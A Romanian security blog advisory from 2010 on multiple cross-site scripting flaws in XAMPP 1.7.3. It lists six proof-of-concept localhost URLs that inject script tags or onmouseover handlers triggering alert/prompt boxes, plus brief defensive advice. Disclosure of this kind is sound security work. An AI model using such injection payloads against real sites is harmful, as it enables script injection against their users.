Xampp 1.7.3 – vulnerabilitati multiple - Securitatea Informatica

Xampp 1.7.3 – vulnerabilitati multiple

Data:
6 noiembrie 2010

Descriere:
XAMPP este o distribuţie Apache care conţin MySQL, PHP şi Perl.

Vulnerabilitati:

http://localhost/xampp/ming.php/"<script>alert("XSS")</script>
http://localhost/xampp/iart.php/"onmouseover=prompt("XSS")>
http://localhost/xampp/cds.php/'onmouseover=alert("XSS")>
http://localhost/xampp/aspinfo.asp/1<script>alert("XSS")</script>
http://localhost/xampp/adodb.php/"onmouseover=prompt("XSS")>
http://localhost/xampp/perlinfo.pl/1<script>prompt("XSS")</script>

Aparare:
Producatorul ar trebui să filtreze caracterele speciale din formulare.
Clienţii ar trebui să stabilească parola de acces la XAMPP folder.

Twitter Digg Delicious Stumbleupon Technorati Facebook


Nici un comentariu inca... Fii primul care lasa un comentariu!

Lasa un raspuns

This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro